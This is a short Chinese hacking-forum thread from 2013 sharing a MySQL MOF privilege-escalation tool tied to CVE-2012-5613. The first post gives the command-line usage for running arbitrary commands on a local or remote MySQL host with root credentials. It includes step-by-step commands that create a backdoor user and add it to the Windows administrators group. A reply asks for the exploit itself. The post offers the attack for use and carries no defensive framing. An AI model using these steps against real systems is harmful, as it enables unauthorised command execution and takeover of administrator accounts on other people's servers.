david2013 发表于 2013-2-5 09:42:32

Mysql_mof提权

测试环境:win2003 x86

1、支持自定义命令
2、支持远程和本地
3、用法
C:\>mysqlMof.exe
Usage: mysqlMof.exe host username password CMD
Demo:mysqlMof.exe MysqlMof.exe localhost 3306 root root test "notepad.exe" gbk

加用户(同时执行可能会不成功),分别执行:
3.1、mysqlMof.exe MysqlMof.exe localhost 3306 root root test "net user test test /add" gbk

等test添加成功

3.2、mysqlMof.exe MysqlMof.exe localhost 3306 root root test "net localgroup administrators test /add" gbk

_CVE-2012-5613详情:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5613

冰刀 发表于 2013-2-5 16:26:16

收下了
---
EXP有木有呀
页: [1]
查看完整版本: Mysql_mof提权